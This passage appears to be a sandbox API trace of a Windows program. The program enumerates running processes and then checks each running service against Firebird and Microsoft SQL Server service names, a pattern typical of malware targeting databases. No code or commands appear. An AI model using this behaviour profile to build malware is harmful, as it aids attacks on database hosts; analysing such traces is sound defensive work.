lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tabs_dimensions.exe")) returned 1 [0199.836] lstrlenW (lpString="tabs_dimensions.exe") returned 19 [0199.836] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerts_input_maybe.exe")) returned 1 [0199.837] lstrlenW (lpString="concerts_input_maybe.exe") returned 24 [0199.837] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="nearby-installations-wise.exe")) returned 1 [0199.838] lstrlenW (lpString="nearby-installations-wise.exe") returned 29 [0199.838] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="statementswalkstramadol.exe")) returned 1 [0199.839] lstrlenW (lpString="statementswalkstramadol.exe") returned 27 [0199.839] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="playstation iraq.exe")) returned 1 [0199.840] lstrlenW (lpString="playstation iraq.exe") returned 20 [0199.840] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="harbor.exe")) returned 1 [0199.841] lstrlenW (lpString="harbor.exe") returned 10 [0199.841] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x86c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="promoting-walker-outdoor.exe")) returned 1 [0199.842] lstrlenW (lpString="promoting-walker-outdoor.exe") returned 28 [0199.842] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charlie_sperm_new.exe")) returned 1 [0199.844] lstrlenW (lpString="charlie_sperm_new.exe") returned 21 [0199.844] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="marie-lebanon.exe")) returned 1 [0199.845] lstrlenW (lpString="marie-lebanon.exe") returned 17 [0199.845] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="bad-length-especially.exe")) returned 1 [0199.848] lstrlenW (lpString="bad-length-especially.exe") returned 25 [0199.848] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="larent.exe")) returned 1 [0199.849] lstrlenW (lpString="larent.exe") returned 10 [0199.849] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="stereo.exe")) returned 1 [0199.850] lstrlenW (lpString="stereo.exe") returned 10 [0199.850] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge arrival racial.exe")) returned 1 [0199.852] lstrlenW (lpString="charge arrival racial.exe") returned 25 [0199.852] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="uniprotkbthusembassy.exe")) returned 1 [0200.186] lstrlenW (lpString="uniprotkbthusembassy.exe") returned 24 [0200.186] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x26c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="state.exe")) returned 1 [0200.187] lstrlenW (lpString="state.exe") returned 9 [0200.188] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0200.189] lstrlenW (lpString="TrustedInstaller.exe") returned 20 [0200.189] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0200.190] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0200.190] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0200.191] lstrlenW (lpString="taskhostw.exe") returned 13 [0200.191] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0200.192] lstrlenW (lpString="sppsvc.exe") returned 10 [0200.192] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.193] lstrlenW (lpString="svchost.exe") returned 11 [0200.193] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="Pg.exe")) returned 1 [0200.194] lstrlenW (lpString="Pg.exe") returned 6 [0200.194] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0200.195] lstrlenW (lpString="CompatTelRunner.exe") returned 19 [0200.195] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0200.196] lstrlenW (lpString="conhost.exe") returned 11 [0200.196] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0200.197] lstrlenW (lpString="cmd.exe") returned 7 [0200.197] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0200.198] lstrlenW (lpString="conhost.exe") returned 11 [0200.198] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0200.199] CloseHandle (hObject=0x3dc) returned 1 [0200.199] Sleep (dwMilliseconds=0x1f4) [0201.558] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x236ba58 [0201.558] EnumServicesStatusExW (in: hSCManager=0x236ba58, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 0 [0201.559] GetLastError () returned 0xea [0201.559] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x2090) returned 0x2372d70 [0201.559] EnumServicesStatusExW (in: hSCManager=0x236ba58, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x2372d70, cbBufSize=0x2090, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x2372d70, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 1 [0201.560] CloseServiceHandle (hSCObject=0x236ba58) returned 1 [0201.560] lstrlenW (lpString="Appinfo") returned 7 [0201.560] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0201.560] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0201.560] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0201.560] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0201.560] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0201.560] lstrlenW (lpString="AppXSvc") returned 7 [0201.560] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0201.560] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0201.560] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0201.560] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0201.560] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0201.560] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0201.560] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0201.560] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0201.561] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0201.561] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0201.561] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0201.561] lstrlenW (lpString="Audiosrv") returned 8 [0201.561] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0201.561] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0201.561] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0201.561] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0201.561] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0201.561] lstrlenW (lpString="BFE") returned 3 [0201.561] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0201.561] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0201.561] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0201.561] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0201.561] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0201.561] lstrlenW (lpString="BITS") returned 4 [0201.561] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0201.561] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0201.561] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0201.561] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0201.561] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0201.561] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0201.561] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0201.562] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0201.562] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0201.562] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0201.562] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0201.562] lstrlenW (lpString="CDPSvc") returned 6 [0201.562] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0201.562] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0201.562] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0201.562] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0201.562] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0201.562] lstrlenW (lpString="ClickToRunSvc") returned 13 [0201.562] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0201.562] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0201.562] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0201.562] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0201.562] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0201.562] lstrlenW (lpString="ClipSVC") returned 7 [0201.562] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClipSVC") returned 1 [0201.562] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClipSVC") returned 1 [0201.562] lstrcmpiW (lpString1="sqlwriter", lpString2="ClipSVC") returned 1 [0201.562] lstrcmpiW (lpString1="mssqlserver", lpString2="ClipSVC") returned 1 [0201.562] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClipSVC") returned 1 [0201.562] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0201.562] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0201.562] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0201.562] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0201.562] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0201.562] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0201.562] lstrlenW (lpString="CryptSvc") returned 8 [0201.562] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0201.563] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0201.563] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0201.563] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0201.563] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0201.563] lstrlenW (lpString="DcomLaunch") returned 10 [0201.563] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0201.563] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0201.563] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0201.563] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0201.563] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0201.563] lstrlenW (lpString="DeviceAssociationService") returned 24 [0201.563] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0201.563] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0201.563] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0201.563] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0201.563] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0201.563] lstrlenW (lpString="Dhcp") returned 4 [0201.563] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0201.563] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0201.563] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0201.563] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0201.563] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0201.563] lstrlenW (lpString="Dnscache") returned 8 [0201.563] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0201.563] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0201.563] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0201.563] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0201.563] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0201.563] lstrlenW (lpString="DoSvc") returned 5 [0201.564] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0201.564] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0201.564] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0201.564] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0201.564] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0201.564] lstrlenW (lpString="DPS") returned 3 [0201.564] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0201.564] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0201.564] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0201.564] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0201.564] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0201.564] lstrlenW (lpString="DusmSvc") returned 7 [0201.564] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0201.564] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0201.564] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0201.564] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0201.564] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0201.564] lstrlenW (lpString="EventLog") returned 8 [0201.564] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0201.564] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0201.564] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0201.564] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0201.564] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0201.564] lstrlenW (lpString="EventSystem") returned 11 [0201.564] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0201.564] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0201.564] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0201.564] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0201.564] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0201.564] lstrlenW (lpString="FontCache") returned 9 [0201.565] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0201.565] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0201.565] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0201.565] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0201.565] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0201.565] lstrlenW (lpString="gpsvc") returned 5 [0201.565] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0201.565] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0201.565] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0201.565] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0201.565] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0201.565] lstrlenW (lpString="iphlpsvc") returned 8 [0201.565] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0201.565] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0201.565] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0201.565] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0201.565] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0201.565] lstrlenW (lpString="KeyIso") returned 6 [0201.565] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0201.565] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0201.565] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0201.565] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0201.565] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0201.565] lstrlenW (lpString="LanmanServer") returned 12 [0201.565] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0201.565] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0201.565] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0201.565] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0201.565] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0201.565] lstrlenW (lpString="LanmanWorkstation") returned 17 [0201.566] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0201.566] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0201.566] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0201.566] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0201.566] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0201.566] lstrlenW (lpString="lfsvc") returned 5 [0201.566] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0201.566] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0201.566] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0201.566] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0201.566] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0201.566] lstrlenW (lpString="LicenseManager") returned 14 [0201.566] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LicenseManager") returned -1 [0201.566] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LicenseManager") returned -1 [0201.566] lstrcmpiW (lpString1="sqlwriter", lpString2="LicenseManager") returned 1 [0201.566] lstrcmpiW (lpString1="mssqlserver", lpString2="LicenseManager") returned 1 [0201.566] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LicenseManager") returned 1 [0201.566] lstrlenW (lpString="lmhosts") returned 7 [0201.566] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0201.566] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0201.566] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0201.566] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0201.566] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0201.566] lstrlenW (lpString="LSM") returned 3 [0201.566] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0201.566] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0201.566] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0201.566] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0201.566] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0201.566] lstrlenW (lpString="MpsSvc") returned 6 [0201.567] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0201.567] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0201.567] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0201.567] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0201.567] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0201.567] lstrlenW (lpString="NcbService") returned 10 [0201.567] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0201.567] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0201.567] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 